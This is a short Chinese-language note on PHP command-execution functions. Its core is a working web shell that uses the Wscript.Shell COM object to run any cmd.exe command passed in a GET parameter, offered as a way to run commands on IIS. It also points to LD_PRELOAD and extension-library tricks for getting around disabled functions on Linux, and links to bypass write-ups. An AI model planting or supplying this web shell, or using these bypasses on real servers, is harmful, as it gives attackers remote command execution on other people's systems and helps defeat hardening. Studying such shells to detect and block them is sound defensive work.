唔,笔记。

命令执行函数:

1
2
3
4
5
6
7
system
passthru
exec
pcntl_exec(linux)
shell_exec = ``(反单引号)
popen
proc_open

ps:
iis可以尝试调用com来执行命令
Wscript.Shell和Shell.Application

1
2
3
4
5
6
7
<?php
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec("cmd.exe /c ".$_GET['c']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

linux还可以尝试用LD_PRELOAD,扩展库绕过

参考链接:
http://blog.leanote.com/post/xuxi/PHP-Webshell%E4%B8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E9%99%90%E5%88%B6%E5%8F%8A%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95
https://chybeta.github.io/2017/08/08/php%E4%BB%A3%E7%A0%81-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/#%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E7%9B%B8%E5%85%B3